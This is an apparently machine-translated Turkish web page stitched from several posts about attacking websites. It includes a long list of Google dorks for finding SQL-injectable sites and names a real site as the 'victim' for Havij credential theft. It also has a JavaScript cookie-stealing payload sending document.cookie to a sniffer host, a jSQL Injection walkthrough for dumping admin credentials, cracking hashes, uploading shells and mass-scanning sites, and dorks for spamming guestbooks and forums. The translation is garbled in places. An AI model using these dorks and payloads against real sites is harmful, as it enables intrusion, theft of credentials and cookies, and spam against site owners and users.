Kali Linux'ta SQL enjeksiyonunu aramak ve kullanmak için çok işlevli bir araç olan jSQL Injection'ı kullanma talimatları. Kali Linux Gr'de SQL Enjeksiyonlarını aramak ve kullanmak için çok işlevli bir araç olan jSQL Injection'ı kullanma talimatları

  • 21.04.2021
Ve şimdi size bir şey hakkında özel bir bilginiz olmadan bir şeyi nasıl hackleyeceğinizi anlatacağım. Hemen bunun çok az faydası olduğunu söylüyorum, ama yine de.
İlk olarak, sitelerin kendilerini bulmanız gerekir. Bunu yapmak için google.com'a gidin ve dorks arayın

Inurl: pageid = inurl: games.php?Id = inurl:page.php?Dosya = inurl:newsDetail.php?Id = inurl:galler.php?Id = inurl:makale.php?Id = inurl: show.php? id = inurl: staff_id = inurl: newsitem.php?num = inurl: readnews.php? Sorular-View.php?Num = inurl: forum_bds.php?Num = inurl: game.php?Id = inurl: view_product.php?Id = inurl: newone.php?Id = inurl: sw_comment.php?Id = inurl: news.php? id = inurl: avd_start.php? avd = inurl: event.php? id = inurl: ürün-öğe.php? id = inurl: sql.php? id = inurl: news_view.php? id = inurl: mizah.php? id = inurl: aboutbook.php? id = inurl: ogl_inet.php?ogl_id = inurl: fiche_spectacle.php? php3 id = inurl: kategorie.php4 id = inurl: news.php id = inurl: index.php id = inurl: faq2.php id = inurl: show_an.php id = inurl: önizleme.php? id = inurl: loadpsb.php? id = inurl: görüşler.php? id = inurl: spr.php? id = inurl: page.php? id = inurl: duyuru.php? id = inurl: clanek.php4? id = ben nurl: katılımcı.php? id = inurl: download.php? id = inurl: main.php? id = inurl: inceleme.php? id = inurl: chappies.php? id = inurl: read.php? id = inurl: prod_detail.php? id = inurl: viewphoto.php? id = inurl: makale.php? id = inurl: person.php? id = inurl: productinfo.php? id = inurl: showimg.php? id = inurl: görünüm. php? id = inurl: website.php? id = inurl: hosting_info.php? id = inurl: galeri.php? id = inurl: rub.php? idr = inurl: view_faq.php? id = inurl: artikelinfo.php? id = inurl: detay.php? Kimlik = inurl: index.php? = inurl: profile_view.php? id = inurl: kategori.php? id = inurl: yayınlar.php? id = inurl: arkadaşlar.php? id = inurl : downloads_info.php? id = inurl: prod_info.php? id = inurl: shop.php? do = parça ve id = inurl: productinfo.php? id = inurl: collectionitem.php? id = inurl: band_info.php? id = inurl : product.php? id = inurl: releases.php? id = inurl: ray.php? id = inurl: produit.php? id = inurl: pop.php? id = inurl: alışveriş.php? id = inurl : productdetail .php? id = inurl: post.php? id = inurl: viewshowdetail.php? id = inurl: clubpage.php? id = inurl: üyeInfo.php? id = inurl: bölüm.php? id = in url: theme.php? id = inurl: page.php? id = inurl: parçalayıcı-categories.php? id = inurl: tradeCategory.php? id = inurl: product_ranges_view.php? ID = inurl: shop_category.php? id = inurl: transkript.php? id = inurl: channel_id = inurl: item_id = inurl: newsid = inurl: trainers.php? id = inurl: news-full.php? id = inurl: news_display.php?getid = inurl: indeks2. seçenek = inurl: readnews.php? id = inurl: top10.php? cat = inurl: newzone.php? id = inurl: event.php? id = inurl: ürün-item.php? id = inurl: sql. php?id = inurl: aboutbook.php? id = inurl: duyuru.php? id = inurl: chappies.php? id = inurl: read.php? id = inurl: viewapp.php? id = inurl: viewphoto.php? id = inurl: rub.php? inurl: galeri_info.php? l = inurl: inceleme.php? id = inurl: iniziativa.php? bak.php? Kimlik = inurl: newzone.php?Id = inurl: aboutbook.php?Id = inurl: malzeme.php?Id = inurl: views.php? inurl: galeri_info.php? l = inurl: tekst.php? idt = inurl: newscat.php? id = inurl: newsticker_info.php? idn = inurl: rubrika.php? idr = inurl: rubp.php? idr = inurl: idf = inurl: art.php? idm = inurl: title.php? id = inurl: ". php? id = 1" inurl: ". php? cat = 1" inurl: ". php? catid = 1 "inurl:". Php? Num = 1 "inurl:". Php? Bid = 1 "inurl:". Php? Pid = 1 "inurl:". Php? Nid = 1 "

işte küçük bir liste. Kendi kullanabilirsiniz. Ve böylece siteyi bulduk. Örneğin http://www.vestitambov.ru/
Ardından, bu programı indirin

** Gizli İçerik: Bu gizli içeriği görebilmeniz için gönderi sayınızın 3 veya daha fazla olması gerekir. **

Tamam'ı tıklayın. Sonra kurbanın sitesini yerleştiririz.
Başlat'a basıyoruz. Ardından, sonuçları bekliyoruz.
Ve böylece program bir SQL güvenlik açığı buldu.

Ardından Havij'i indirin, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= ortaya çıkan bağlantıyı buraya yapıştırın. Havij'i nasıl kullanacağımı ve nerede indirmeyeceğimi açıklayarak bulmak zor değil. Her şey. İhtiyacınız olan verileri aldınız - yönetici şifresi ve sonrası hayal gücünüze kalmış.

not Bu benim ilk bir şeyler yazma denemem. bir şeyler ters giderse özür dilerim

Biraz bilgi güvenliğinden bahsetmeye karar verdim. Makale, acemi programcılar ve Frontend geliştirmeye yeni başlayanlar için faydalı olacaktır. Sorun nedir?

Birçok acemi geliştirici, kod yazmaya o kadar bağımlıdır ki, çalışmalarının güvenliğini tamamen unuturlar. Ve en önemlisi SQL sorgusu, XXS gibi güvenlik açıklarını unuturlar. Ayrıca yönetici panelleri için hafif şifreler bulurlar ve kaba kuvvete maruz kalırlar. Bu saldırılar nelerdir ve nasıl önlenebilir?

SQL enjeksiyonu

SQL enjeksiyonu, belirli bir DBMS için bir SQL sorgusu ile gerçekleştirilen en yaygın veritabanı saldırısı türüdür. Birçok kişi ve hatta büyük şirketler bu tür saldırılardan muzdariptir. Bunun nedeni, bir geliştiricinin bir veritabanı ve aslında SQL sorguları yazarken yaptığı hatadır.

SQL sorgularında kullanılan giriş verilerinin yanlış işlenmesi nedeniyle bir SQL enjeksiyon saldırısı mümkündür. Bir bilgisayar korsanı bir saldırıyı başarıyla tamamlarsa, yalnızca veritabanlarının içeriğini değil, aynı zamanda sırasıyla yönetim panelinin şifrelerini ve günlüklerini de kaybetme riskiniz vardır. Ve bu veriler siteyi tamamen ele geçirmek veya geri dönüşü olmayan ayarlamalar yapmak için oldukça yeterli olacaktır.

Saldırı PHP, ASP, Perl ve diğer dillerde yazılmış komut dosyalarında başarıyla yeniden oluşturulabilir. Bu tür saldırıların başarısı, daha çok hangi DBMS'nin kullanıldığına ve betiğin kendisinin nasıl uygulandığına bağlıdır. Dünyada çok sayıda savunmasız SQL enjeksiyon sitesi var. Bunu doğrulamak kolaydır. "Dorks" girmek yeterlidir - bunlar savunmasız siteleri aramak için özel isteklerdir. İşte onlardan bazıları:

  • inurl: index.php?id =
  • inurl: trainers.php?id =
  • inurl: buy.php? kategori =
  • inurl: makale.php?Kimlik =
  • inurl: play_old.php?id =
  • inurl: bildirge_more.php? decl_id =
  • inurl: sayfa kimliği =
  • inurl: games.php?id =
  • inurl: page.php?dosya =
  • inurl: newsDetail.php?id =
  • inurl: galeri.php?id =
  • inurl: makale.php?id =

Nasıl kullanılır? Bunları bir Google veya Yandex arama motoruna girmeniz yeterlidir. Arama motoru size yalnızca savunmasız bir site değil, aynı zamanda bu güvenlik açığı için bir sayfa da verecektir. Ancak bunun üzerinde durmayacağız ve sayfanın gerçekten savunmasız olduğundan emin olmayacağız. Bunu yapmak için "id = 1" değerinden sonra tek bir tırnak işareti koymak yeterlidir. Bunun gibi bir şey:

  • inurl: games.php?id = 1 '

Ve site bize SQL sorgusu hakkında bir hata verecektir. Bilgisayar korsanımızın bundan sonra neye ihtiyacı var?

Ve sonra hata sayfasına giden bu bağlantıya ihtiyacı var. Ardından, çoğu durumda güvenlik açığı üzerindeki çalışma, bu kısım için yardımcı programlarıyla birlikte "Kali linux" dağıtımında gerçekleşir: enjeksiyon kodunun enjekte edilmesi ve gerekli işlemlerin yapılması. Bu nasıl olacak, size söyleyemem. Ancak bununla ilgili bilgileri internette bulabilirsiniz.

XSS Saldırısı

Bu tür saldırılar çerezler üzerinde gerçekleştirilir. Kullanıcılar, sırayla, onları kurtarmaya çok düşkündür. Neden olmasın? Onlarsız nasıl olabilir? Gerçekten de, Çerezler sayesinde, Vk.com veya Mail.ru'dan yüzlerce kez şifre kullanmıyoruz. Ve onları reddedenlerin çok azı. Ancak internette, bilgisayar korsanları için genellikle bir kural belirir: kolaylık faktörü, güvensizlik faktörü ile doğru orantılıdır.

Bir XSS saldırısı uygulamak için bilgisayar korsanımızın JavaScript bilgisine ihtiyacı var. İlk bakışta, dil çok basit ve zararsızdır, çünkü bilgisayar kaynaklarına erişimi yoktur. Bir bilgisayar korsanı JavaScript ile yalnızca bir tarayıcıda çalışabilir, ancak bu yeterlidir. Sonuçta, ana şey kodu web sayfasına girmek.

Saldırı süreci hakkında ayrıntılı olarak konuşmayacağım. Size bunun nasıl olduğunun temellerini ve anlamını anlatacağım.

Bir bilgisayar korsanı, bir foruma veya ziyaretçi defterine JS kodu ekleyebilir:

Komut dosyaları bizi, kodun yürütüleceği virüslü sayfaya yönlendirecektir: ister koklayıcı, ister bir tür depolama veya bir şekilde Çerezlerimizi önbellekten çalacak bir istismar olsun.

Neden JavaScript? Çünkü JavaScript, web istekleriyle iyi geçinir ve çerezlere erişimi vardır. Ancak betiğimiz bizi bir siteye aktaracaksa, kullanıcı bunu kolayca fark edecektir. Burada bilgisayar korsanı daha kurnaz bir seçenek kullanır - kodu resme girer.

İmg = yeni Resim ();

Img.src = ”http://192.168.1.7/sniff.php?32+document.cookie;

Sadece bir görüntü oluşturuyoruz ve betiğimizi ona bir adres olarak atadık.

Kendinizi tüm bunlardan nasıl korursunuz? Çok basit - şüpheli bağlantılara tıklamayın.

DoS ve DDos Saldırıları


DoS (İngilizce Hizmet Reddi'nden - hizmet reddi) - bir bilgisayar sistemini başarısızlığa uğratmak amacıyla bir bilgisayar korsanı saldırısı. Bu, sistemin vicdanlı kullanıcılarının sağlanan sistem kaynaklarına (sunuculara) erişemeyeceği veya bu erişimin zor olduğu koşulların yaratılmasıdır. Acil bir durumda yazılım herhangi bir kritik bilgi verirse, sistemin arızası, yakalanması için bir adım olabilir: örneğin, sürüm, program kodunun bir kısmı, vb. Ancak çoğu zaman bu, ekonomik baskının bir ölçüsüdür. : gelir getiren basit bir hizmetin kaybı. Sağlayıcıdan gelen faturalar veya bir saldırıyı önlemek için alınan önlemler hedefi önemli ölçüde vurdu.Şu anda, DoS ve DDoS saldırıları en popüler olanlardır, çünkü yasal olarak önemli kanıtlar bırakmadan hemen hemen her sistemin başarısız olmasına izin verirler.

DoS ve DDos saldırıları arasındaki fark nedir?

DoS, akıllıca oluşturulmuş bir saldırıdır. Örneğin, sunucu gelen paketlerin doğruluğunu kontrol etmezse, bilgisayar korsanı sonsuza kadar işlenecek böyle bir istekte bulunabilir ve diğer bağlantılarla çalışmak için yeterli işlemci zamanı olmayacaktır. Buna göre, müşteriler bir hizmet reddi alacaktır. Ancak büyük tanınmış siteleri bu şekilde aşırı yüklemek veya devre dışı bırakmak işe yaramaz. Oldukça geniş kanallarla ve böyle bir aşırı yüklenmeyle sorunsuz bir şekilde başa çıkabilen süper güçlü sunucularla donanmışlar.

DDoS, aslında DoS ile aynı saldırıdır. Ancak DoS'ta bir istek paketi varsa, DDoS'ta yüzlerce veya daha fazla istek paketi olabilir. Süper güçlü sunucular bile bu aşırı yükü kaldıramayabilir. Sana bir örnek vereyim.

DoS saldırısı, birisiyle sohbet ederken, sonra kötü niyetli bir kişinin gelip yüksek sesle bağırmaya başlamasıdır. Aynı zamanda konuşmak ya imkansız ya da çok zor. Çözüm: Sakinleşecek ve kişiyi odadan çıkaracak güvenliği arayın. DDoS saldırıları, bu tür kötü niyetli insanların binlerce kişilik bir kalabalık tarafından içeri atılmasıdır. Bu durumda, gardiyanlar herkesi bükemez ve alamaz.

DoS ve DDoS, zombi adı verilen bilgisayarlardan üretilir. Bunlar, bilgisayarlarının bir sunucuya yapılan bir saldırıya karıştığından şüphelenmeyen bilgisayar korsanları tarafından saldırıya uğrayan kullanıcıların bilgisayarlarıdır.

Kendinizi bundan nasıl korursunuz? Genel olarak, hiçbir şey. Ancak bir hacker için görevi karmaşık hale getirmek mümkündür. Bunun için güçlü sunuculara sahip iyi bir hosting seçmeniz gerekiyor.

kaba kuvvet saldırısı

Bir geliştirici, saldırılara karşı birçok koruma sistemi bulabilir, yazdığımız komut dosyalarını tamamen görüntüleyebilir, siteyi güvenlik açıkları için kontrol edebilir, vb. Ancak site düzeninin son aşamasına, yani admin paneline şifre koymanın kolay olacağı zaman geldiğinde, bir şeyi unutabilir. Parola!

Basit bir şifre belirlemeniz kesinlikle önerilmez. 12345, 1114457, vasya111 vb. olabilir. 10-11 karakterden kısa şifrelerin ayarlanması önerilmez. Aksi takdirde, en yaygın ve zor olmayan saldırıya maruz kalabilirsiniz - Kaba kuvvet.

Brute-force, özel programlar kullanan sözlük tabanlı bir parola kaba kuvvet saldırısıdır. Sözlükler farklı olabilir: Latince, sayılarla numaralandırma, diyelim ki belirli bir aralığa kadar, karışık (Latin + sayılar) ve hatta benzersiz sembollere sahip sözlükler bile var @ # 4 $% & * ~~ `’ ”\? vesaire.

Elbette bu tür bir saldırı, karmaşık bir şifre oluşturularak kolayca önlenebilir. Captcha bile sizi kurtarabilir. Ayrıca, siteniz bir CMS üzerinde yapılmışsa, birçoğu bu tür saldırıları hesaplar ve IP'yi engeller. Parolada ne kadar farklı karakter varsa, onu bulmanın o kadar zor olduğunu her zaman hatırlamalısınız.

Hacker'lar nasıl çalışır? Çoğu durumda, parolanın bir kısmından şüphelenirler veya önceden bilirler. Kullanıcı şifresinin kesinlikle 3 veya 5 karakterden oluşamayacağını varsaymak oldukça mantıklıdır. Bu şifreler sık ​​sık saldırılara yol açar. Temel olarak, bilgisayar korsanları 5 ila 10 karakter aralığı alır ve oraya muhtemelen önceden bildikleri birkaç karakter ekler. Ardından, gerekli aralıklara sahip şifreler oluşturulur. Kali linux dağıtımında bu tür durumlar için programlar bile var. Ve işte, sözlüğün hacmi artık çok büyük olmadığı için saldırı artık uzun sürmeyecek. Ayrıca, bir bilgisayar korsanı video kartının gücünü kullanabilir. Bazıları CUDA sistemini desteklerken, arama hızı 10 kata kadar artıyor. Ve şimdi bu kadar basit bir şekilde bir saldırının oldukça gerçek olduğunu görüyoruz. Ancak sadece siteler kaba kuvvete tabi değildir.

Sevgili geliştiriciler, bilgi güvenliği sistemini asla unutmayın, çünkü bugün devletler de dahil olmak üzere birçok insan bu tür saldırılardan muzdarip. Sonuçta, en büyük güvenlik açığı, her zaman bir yerde veya gözden kaçmayan bir yerde dikkati dağılabilen bir kişidir. Biz programcıyız ama programlanmış makine değiliz. Her zaman tetikte olun, çünkü bilgi kaybı ciddi sonuçlarla tehdit ediyor!

İndirilen dosyayı çift tıklayarak çalıştırın (bir sanal makineniz olması gerekir).

3. Siteyi SQL enjeksiyonu için kontrol ederken anonimlik

Kali Linux'ta Tor ve Privoxy'yi Yapılandırma

[Yapım aşamasında olan bölüm]

Windows'ta Tor ve Privoxy'yi Yapılandırma

[Yapım aşamasında olan bölüm]

jSQL Injection'da bir proxy üzerinden çalışma ayarları

[Yapım aşamasında olan bölüm]

4. Siteyi jSQL Injection ile SQL enjeksiyonu için kontrol etme

Programla çalışmak son derece basittir. Site adresini girip ENTER tuşuna basmanız yeterlidir.

Sonraki ekran görüntüsü, sitenin aynı anda üç tür SQL enjeksiyonuna karşı savunmasız olduğunu gösteriyor (bunlarla ilgili bilgiler sağ alt köşede belirtilmiştir). Enjeksiyonların adlarına tıklayarak kullanılan yöntemi değiştirebilirsiniz:

Ayrıca, mevcut veritabanları zaten görüntülendi.

Her tablonun içeriğini görebilirsiniz:

Genellikle tablolardaki en ilginç şey yöneticinin kimlik bilgileridir.

Şanslıysanız ve yöneticinin verilerini bulduysanız, sevinmek için çok erken. Ayrıca, bu verileri nereye gireceğinizi yönetici panelini bulmanız gerekir.

5. jSQL Injection ile yönetici alanlarını arayın

Bunu yapmak için bir sonraki sekmeye gidin. Burada bizi olası adreslerin bir listesi karşılıyor. Kontrol etmek için bir veya birkaç sayfa seçebilirsiniz:

Kolaylık, başka programları kullanmanıza gerek olmaması gerçeğinde yatmaktadır.

Ne yazık ki, parolaları düz metin olarak saklayan çok fazla dikkatsiz programcı yoktur. Oldukça sık, şifre satırında şöyle bir şey görürüz:

8743b52063cd84097a65d1633f5c74f5

Bu bir hash. Kaba kuvvetle şifresini çözebilirsiniz. Ve ... jSQL Injection'ın yerleşik bir kaba kuvveti vardır.

6. jSQL Injection kullanarak kaba zorlama karmaları

Kuşkusuz kolaylık, başka programlar aramanıza gerek olmamasıdır. En popüler karmaların çoğu için desteği vardır.

Bu en iyi seçenek değil. Karmaların kodunu çözmede guru olmak için Rusça "" Kitabı önerilir.

Ancak, elbette, elinizde başka bir program olmadığında veya öğrenecek zaman olmadığında, yerleşik bir kaba kuvvet işlevine sahip jSQL Injection kullanışlı olacaktır.

Ayarlar var: Şifreye hangi karakterlerin dahil edileceğini, şifre uzunluk aralığını ayarlayabilirsiniz.

7. SQL enjeksiyonunu tespit ettikten sonra dosyalarla yapılan işlemler

Veritabanlarıyla yapılan işlemlere ek olarak - bunları okuma ve değiştirme, SQL enjeksiyonlarının tespit edilmesi durumunda aşağıdaki dosya işlemleri gerçekleştirilebilir:

  • sunucudaki dosyaları okuma
  • sunucuya yeni dosya yükleme
  • sunucuya kabuk yükleme

Ve tüm bunlar jSQL Injection'da uygulanmaktadır!

Kısıtlamalar vardır - SQL sunucusunun dosya ayrıcalıklarına sahip olması gerekir. Makul sistem yöneticileri için devre dışı bırakılırlar ve dosya sistemine erişemezsiniz.

Dosya ayrıcalıklarının varlığını kontrol etmek yeterince kolaydır. Sekmelerden birine gidin (dosya okuma, kabuk oluşturma, yeni dosya yükleme) ve belirtilen işlemlerden birini gerçekleştirmeyi deneyin.

Bir diğer çok önemli not - birlikte çalışacağımız dosyanın tam yolunu bilmemiz gerekiyor - aksi takdirde hiçbir şey işe yaramaz.

Aşağıdaki ekran görüntüsüne bir göz atın:

Bir dosya üzerinde herhangi bir işlem yapma girişimi şu şekilde yanıtlanır: DOSYA ayrıcalığı yok(dosya ayrıcalığı yok). Ve bu konuda hiçbir şey yapılamaz.

Bunun yerine farklı bir hatanız varsa:

[dizin_adı] içine yazma sorunu

Bu, dosyayı yazmak istediğiniz mutlak yolu yanlış belirttiğiniz anlamına gelir.

Mutlak bir yol varsaymak için en azından sunucunun üzerinde çalıştığı işletim sistemini bilmelisiniz. Bunu yapmak için Ağ sekmesine geçin.

Böyle bir giriş (satır Win64) bize bir Windows işletim sistemi ile uğraştığımızı varsaymamız için neden veriyor:

Canlı Tut: zaman aşımı = 5, maks = 99 Sunucu: Apache / 2.4.17 (Win64) PHP / 7.0.0RC6 Bağlantı: Canlı Tut Yöntemi: HTTP / 1.1 200 Tamam İçerik Uzunluğu: 353 Tarih: Cum, 11 Aralık 2015 11:48:31 GMT X-Powered-By: PHP / 7.0.0RC6 İçerik-Türü: metin / html; karakter kümesi = UTF-8

Burada biraz Unix'imiz var (* BSD, Linux):

Aktarım-Kodlama: yığınlanmış Tarih: Cum, 11 Aralık 2015 11:57:02 GMT Yöntem: HTTP / 1.1 200 Tamam Canlı Tut: zaman aşımı = 3, maks = 100 Bağlantı: canlı tut İçerik Türü: metin / html X- Destekleyen: PHP / 5.3.29 Sunucu: Apache / 2.2.31 (Unix)

Ve burada CentOS var:

Yöntem: HTTP / 1.1 200 Tamam Bitiş: Per, 19 Kasım 1981 08:52:00 GMT Set-Cookie: PHPSESSID = 9p60gtunrv7g41iurr814h9rd0; yol = / Bağlantı: canlı tutma X-Cache-Lookup: t1.hoster.ru:6666'dan MISS Sunucu: Apache / 2.2.15 (CentOS) X-Powered-By: PHP / 5.4.37 X-Cache: MISS'den t1.hoster.ru Önbellek Kontrolü: mağaza yok, önbellek yok, yeniden doğrulamalı, kontrol sonrası = 0, ön kontrol = 0 Pragma: önbellek yok Tarih: Cum, 11 Aralık 2015 12:08:54 GMT Aktarım-Kodlama: parçalı İçerik-Türü: metin / html; karakter kümesi = WINDOWS-1251

Windows'ta, siteler için tipik bir klasör C: \ Sunucu \ veri \ htdocs \... Ancak, aslında, birisi Windows'ta bir sunucu yapmayı "düşündüyse", o zaman büyük olasılıkla, bu kişi ayrıcalıklar hakkında hiçbir şey duymamıştır. Bu nedenle, girişimleri doğrudan C: / Windows / dizininden başlatmaya değer:

Gördüğünüz gibi, ilk seferinde her şey yolunda gitti.

Ancak jSQL Enjeksiyon kabuklarının kendileri şüphelerimi artırıyor. Dosya ayrıcalıklarınız varsa, web arayüzünden kolayca bir şeyler yükleyebilirsiniz.

8. SQL enjeksiyonu için sitelerin toplu kontrolü

Ve hatta jSQL Injection bile bu özelliğe sahiptir. Her şey son derece basit - bir site listesi yükleyin (bir dosyadan içe aktarabilirsiniz), kontrol etmek istediklerinizi seçin ve işlemi başlatmak için uygun düğmeye basın.

jSQL Enjeksiyonu hakkında sonuç

jSQL Injection, sitelerde bulunan SQL Injection'ı bulmak ve kullanmak için iyi ve güçlü bir araçtır. Şüphesiz avantajları: kullanım kolaylığı, yerleşik ilgili işlevler. jSQL Injection, web sitelerini analiz ederken yeni başlayanların en iyi arkadaşı olabilir.

Eksiklikler arasında, veritabanlarını düzenlemenin imkansızlığına dikkat çekerdim (en azından bu işlevi bulamadım). Grafik arayüzlü tüm araçlarda olduğu gibi, bu programın dezavantajları, onu komut dosyalarında kullanmanın imkansızlığına bağlanabilir. Bununla birlikte, yerleşik toplu site kontrol işlevi sayesinde bu programda da bazı otomasyonlar mümkündür.

JSQL Enjeksiyonu, kullanımı sqlmap'ten çok daha uygundur. Ancak sqlmap, daha fazla SQL enjeksiyon türünü destekler, dosya güvenlik duvarları ve diğer bazı işlevlerle çalışma seçeneklerine sahiptir.

Alt satır: jSQL Injection, acemi bir bilgisayar korsanının en iyi arkadaşıdır.

Bu programla ilgili yardımı şu sayfadaki Kali Linux Ansiklopedisinde bulabilirsiniz: http://kali.tools/?p=706

google.com ile doğru arama nasıl yapılır?

Herkes muhtemelen Google gibi bir arama motorunun nasıl kullanılacağını biliyor =) Ama özel yapılar kullanarak doğru bir arama sorgusu oluşturursanız, aradığınız sonuçlara çok daha verimli ve hızlı bir şekilde ulaşacağınızı herkes bilmiyor =) Bu yazımda ben bunu ve doğru arama yapmak için nasıl yapmanız gerektiğini göstermeye çalışacak

Google, google.com'da arama yaparken özel anlamı olan birkaç gelişmiş arama operatörünü destekler. Tipik olarak, bu operatörler aramayı değiştirir ve hatta Google'a tamamen farklı türde aramalar yapmasını söyler. Örneğin, inşaat bağlantı:özel bir operatördür ve istek bağlantı: www.google.com size normal bir arama yapmayacak, bunun yerine google.com'a bağlantıları olan tüm web sayfalarını bulacaktır.
alternatif istek türleri

önbellek: Sorgunuza başka kelimeler eklerseniz, Google, önbelleğe alınan belgede dahil edilen kelimeleri vurgulayacaktır.
Örneğin, önbellek: www.web sitesiönbelleğe alınmış içeriği "web" kelimesi vurgulanmış olarak gösterecektir.

bağlantı: yukarıda tartışılan arama sorgusu, belirtilen sorguya bağlantılar içeren web sayfalarını gösterecektir.
Örneğin: bağlantı: www.site http: //www.site bağlantısı olan tüm sayfaları görüntüler

ilgili: Belirtilen web sayfasıyla "ilgili" web sayfalarını görüntüler.
Örneğin, ilgili: www.google.com Google'ın ana sayfasına benzer web sayfalarını listeler.

bilgi: Bilgi İste: Google'ın istenen web sayfası hakkında sahip olduğu bazı bilgileri sağlar.
Örneğin, bilgi: web sitesi forumumuz hakkında bilgi gösterecektir =) (Armada - Yetişkin web yöneticilerinin Forumu).

Diğer bilgi talepleri

tanımlamak: define: sorgusu, bundan sonra girdiğiniz kelimelerin çeşitli çevrimiçi kaynaklardan derlenmiş bir tanımını sağlayacaktır. Tanım, girilen tüm ifade için olacaktır (yani, tam sorgudaki tüm kelimeleri içerecektir).

hisse senetleri:İsteğinize hisse senedi ile başlarsanız: Google, istek koşullarının geri kalanını hisse senedi simgesi olarak değerlendirir ve bu simgeler için hazır bilgileri gösteren bir sayfaya bağlantı verir.
Örneğin, hisse senetleri: Intel yahoo Intel ve Yahoo hakkında bilgi gösterecektir. (Şirket adını değil, son dakika haberlerini yazmanız gerektiğini unutmayın)

İstek Değiştiriciler

alan: Sorgunuza site: eklerseniz, Google sonuçları o alan adında bulduğu web siteleriyle sınırlar.
Ayrıca ru, org, com, vb. gibi bireysel bölgeleri de arayabilirsiniz ( site: com site: ru)

allintitle: allintitle : ile bir sorgu çalıştırırsanız, Google sonuçları başlıktaki sorgunun tüm kelimeleri ile sınırlandırır.
Örneğin, allintitle: google arama resimler, Blog vb. gibi tüm google arama sayfalarını döndürür

başlık:İsteğinize intitle: eklerseniz, Google sonuçları başlığında o kelimeyi içeren belgelerle sınırlandırır.
Örneğin, başlık: iş

allinurl: allinurl ile bir sorgu çalıştırırsanız: Google, URL'deki sorgunun tüm kelimeleri ile sonuçları sınırlandırır.
Örneğin, allinurl: google arama google ile belgeleri döndürecek ve başlıkta arayacaktır. Ayrıca, bir seçenek olarak, kelimeleri bölü (/) ile ayırabilirsiniz, böylece eğik çizginin her iki tarafındaki kelimeler aynı sayfa içinde aranacaktır: Örnek allinurl: foo / bar

inurl: Sorgunuza inurl: eklerseniz, Google sonuçları URL'de o kelimeyi içeren belgelerle sınırlar.
Örneğin, Animasyon inurl: web sitesi

metin: sadece sayfanın metninde belirtilen kelimeyi arar, başlık ve bağlantı metinlerini ve ilgili olmayan diğer şeyleri görmezden gelir.Bu değiştiricinin bir türevi de vardır - tüm metin: onlar. ayrıca, sorgudaki tüm kelimeler sadece metin içinde aranacaktır, bu da önemli olan, bağlantılarda sık kullanılan kelimelerin göz ardı edilmesidir.
Örneğin, metin: forum

tarih aralığı: zaman dilimlerinde arama yapar (tarih aralığı: 2452389-2452389), tarihler için tarihler Jülyen biçimindedir.

Peki, ve her türlü ilginç istek örneği

Google için sorgu yazma örnekleri. spam gönderenler için

Inurl: control.guest?A = işaret

Site: book.dreambook.com “Ana sayfa URL” “Sign my” inurl: sign

Site: www.freegb.net Ana Sayfa

Inurl: sign.asp “Karakter Sayısı”

"Mesaj:" inurl: sign.cfm "Gönderen:"

Inurl: register.php “Kullanıcı Kaydı” “Web Sitesi”

Inurl: edu / ziyaretçi defteri “Ziyaretçi Defterini İmzala”

Inurl: "Yorum Gönder" "URL" gönder

Inurl: / arşivler / “Yorumlar:” “Bilgiyi hatırlıyor musunuz?”

“Script ve Ziyaretçi Defteri Oluşturan:” “URL:” “Yorumlar:”

Inurl: Eylem = “phpBook” “URL” ekle

Intitle: "Yeni Hikaye Gönder"

dergiler

Inurl: www.livejournal.com/users/ mode = cevap

Inurl greatjournal.com/ mode = cevap

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "misafir defteri"

Bloglar

Inurl: blogger.com/comment.g? ”PostID” “anonim”

Inurl: typepad.com/ “Yorum gönder” “Kişisel bilgileri hatırlıyor musun?”

Inurl: greatjournal.com/community/ “Yorum gönder” “anonim posterlerin adresleri”

“Yorum gönder” “anonim posterlerin adresleri” -

Başlık: "Yorum gönder"

Inurl: pirillo.com “Yorum gönder”

Forumlar

Inurl: gate.html? ”Ad = Forumlar” “mod = yanıt”

Inurl: "forum / posting.php? Mod = cevap"

Inurl: "mes.php?"

Inurl: "üyeler.html"

Inurl: forum / üye listesi.php? ”